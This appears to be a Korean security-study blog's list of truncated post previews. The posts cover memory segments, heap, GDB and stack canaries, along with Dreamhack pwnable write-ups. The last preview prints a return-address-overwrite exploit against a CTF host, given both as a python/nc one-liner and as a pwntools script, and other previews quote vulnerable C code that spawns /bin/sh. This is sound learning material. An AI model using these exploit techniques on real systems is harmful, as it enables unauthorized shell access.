힙이란 ? 요청에 따라 할당되며 chunk 형태로 나뉠 수 있는 인접한 메모리 영역 힙에 메모리를 할당할 때는 malloc() 함수를 사용해야 함 malloc 함수에는 크기를 정하는 인자가 필요하고, 그 크기만큼 공간을 힙 세그먼트에 할당한다. (Top Chunk를 사용해 메모리 할당) 그리고 보이드 포인터로 할당한 메모리의 시작주소를 리턴한다. malloc함수가 어떤 이유로 메모리 할당을 하지 못하게 되면 0값을 리턴한다. malloc에 대응하는 해제 함수는 free()이다. free 함수에는 포인터 인자가 필요하고, 나중에 다시 그 공간을 사용하려면 인자 포인터의 메모리 할당을 해제한다. char *char_ptr; // 힙 메모리 할당 (mem_size 바이트 만큼 할당) char_ptr = (ch..

책을 보고 공부한 내용입니다 X86 프로세서를 기준으로 합니다. 구조체(structs) -> 여러개의 변수를 그룹으로 묶어 하나처럼 다루는 것이 가능하게 하기 위해 구조체라는 것을 사용 -> 구조체가 정의된 후에는 사용할 수 있는 변수 타입이 되고, 구조체 타입으로 변수나 포인터 선언이 가능해짐 struct 구조체이름 *포인터이름 = malloc(sizeof(struct 구조체이름));다음과 같은 구조로 구조체 포인터 선언 가능 시간 함수를 다룰 때 /usr/include/time.h에 정의되어 있는 tm 구조체를 사용하는 것도 가능하다. tm 구조체의 정의 struct tm { int tm_sec; int tm_min; int tm_hour; int tm_mday; int tm_mon; int tm_y..

책을 보고 공부한 내용입니다 X86 프로세서를 기준으로 합니다. C언어에서 파일에 접근하는 방법으로는 크게 2가지가 있다. 1. 파일 서술자 (File Descriptor) 2. 파일 스트림 (Filestream) - 파일 스트림 함수를 사용하는 것이 프로그래밍 하기는 편하지만 파일 서술자가 좀 더 직접적임 ( 파일서술자는 로우레벨, 파일 스트림은 하이레벨 입출력임) 파일 서술자 - open() : 함수를 읽거나 쓸 수 있게 파일을 열고 파일 서술자를 리턴한다. 파일 서술자는 단순한 정수 값이지만 열린 파일마다 고유하다. 파일 서술자는 열린 파일을 가리키는 포인터와 같은 인자로 다른 함수에게 넘겨진다. - close() : 파일 서술자를 인자로 사용 - read() : 파일 서술자, 읽거나 쓸 데이터를 ..

책을 보고 공부한 내용입니다 X86 프로세서를 기준으로 합니다. 메모리 세그먼트 컴파일된 프로그램 메모리는 코드, 데이터, bss, 힙, 스택의 5개의 세그먼트로 나뉜다. 코드 프로그램의 기계어 명령이 들어있음 프로그램이 실행되면 EIP는 코드 세그먼트의 맨 처음 위치로 설정된다. 그리고 프로세스는 다음 작업을 반복 실행한다. 1. EIP가 가리키고 있는 명령을 읽는다. 2. 그 명령의 길이를 EIP에 더한다. 3. 1단계에서 읽은 명령을 수행한다. 4. 1단계로 돌아간다. - 코드 세그먼트는 변수가 아닌 코드만을 저장하고 있으므로 쓰기가 금지되어있다. (사용자가 프로그램 코드를 변경하지 못하게 막기 위함) 코드 세그먼트에 쓰려는 시도가 있을 경우 운영체제가 그 사실을 사용자에게 알리고 프로그램은 종료됨..

책을 보고 공부한 내용입니다 X86 프로세서를 기준으로 합니다. GDB 조사 명령 형식 o : 8진법 x : 16진법 u : 부호가 없는 표준 10진법 t : 2진법 메모리 단일 유닛의 기본 크기는 '워드' 라 불리는 4 byte (32bit 환경에서) b 단일 바이트 h 2byte의 하프워드 w 4byte의 워드 g 8byte의 자이언트 eip 레지스터 : 프로세서가 읽고 있는 현재 명령의 위치를 가리키는 명령 포인터 레지스터 i r eip : eip 레지스터의 현재 메모리 주소 x/x $eip : 16진법으로 eip가 갖고 있는 값 출력 ($eip는 그 순간 eip가 갖고 있는 값을 의미한다.) x/xw $eip : 16진법으로 4byte만큼 출력 ( 리틀엔디안 x ) x/i $eip : eip 위치..

Return Address Overwrite: 반환 주소를 악성 함수의 주소로 덮어서 셸 획득 Stack Canary: 스택 프레임의 반환 주소 전에 랜덤한 카나리를 주입하여 반환 주소를 덮기 어렵게 함 Return to Shellcode: 카나리를 우회하고, 셸 코드를 주입한 버퍼의 주소로 반환 주소를 덮어서 셸 획득 ASLR: 임의 버퍼의 주소를 알기 어렵게 함 NX: 각 세그먼트에 불필요한 실행권한을 제거함으로써 공격자가 임의 버퍼에 주입한 코드를 실행하기 어렵게함 Return to Library -> NX를 우회하는 공격기법 NX로 인해 코드 영역 외에는 실행권한이 없어지기 때문에 실행권한이 남아있는 코드 영역으로 반환 주소를 덮는 공격 기법을 고안했다. 프로세스에 실행 권한이 있는 메모리 영역은..

환경 세팅 Ubuntu 16.04 Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) #include #include #include #include void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } void get_shell() { system("/bin/sh"); } void print_box(un..

checksec ./파일실행명 # 해당 파일에 적용된 보호기법들을 보여준다. pwntools 설치하면 실행 가능 카나리가 적용되어 있는 것을 확인 #include #include int main() { char buf[0x50]; printf("Address of the buf: %p\n", buf); printf("Distance between buf and $rbp: %ld\n", (char*)__builtin_frame_address(0) - buf); //byte printf("[1] Leak the canary\n"); printf("Input: "); fflush(stdout); read(0, buf, 0x100); printf("Your input is '%s'\n", buf); puts("..

오늘은 스택 카나리에 대해 공부를 할 것이다! 스택카나리란? - 스택 버퍼 오버플로우로부터 반환 주소를 보호하는 보호기법 - 스택 카나리는 함수의 프롤로그에서 스택 버퍼와 반환 주소 사이에 임의의 값을 삽입하고, 함수의 에필로그에서 해당 값의 변조를 확인하는 보호 기법이다. 카나리 값의 변조가 확인되면 프로세스는 강제로 종료된다!@! fs? -> TLS(Thread Local Storage)에 카나리를 비롯하여 프로세스 실행에 필요한 여러 데이터가 저장된다고만 일단 알고 있자 Ex) 예를 들어 buf[8]을 read하는 함수에 대해 스택버퍼오버플로우 공격을 진행할 경우 rbp-8 에 저장된 카나리와 fs:0x28 에 저장된 카나리를 xor해서 연산 결과가 0이면 je 성공으로 정상 반환! 결과가 다른 경..

피곤한데 열심히 놀았으니까 양심상 일단 한문제 풀고자려구,,, Ubuntu 16.04 Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 환경은 다음과 같다. #include #include #include #include void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } void read_flag() ..

pwnable 초보인 나에게는 어려운 문제였다.. 원격 서버 환경은 이러하다 Ubuntu 16.04 Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 우선 32bit 환경이기 때문에 스택프레임구조는 buf(n) | sfp(4) | ret(4) 요러하다. #include #include #include #include void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL..

Host: host1.dreamhack.games Port: 10469/tcp 1. python 공격 코드 이용 (python -c "print('A'*0x30 + 'B'*0x8 + '\xaa\x06\x40\x00\x00\x00\x00\x00')";cat)| nc host1.dreamhack.games 10469 2. pwntools 이용 from pwn import * p = remote('host1.dreamhack.games',10469) # 원격 서버 대상으로 익스플로잇 수행 context.arch="amd64" # x86-64 payload = 'A' * 0x30 payload += 'B' * 0x08 payload += '\xaa\x06\x40\x00\x00\x00\x00\x00' # get_..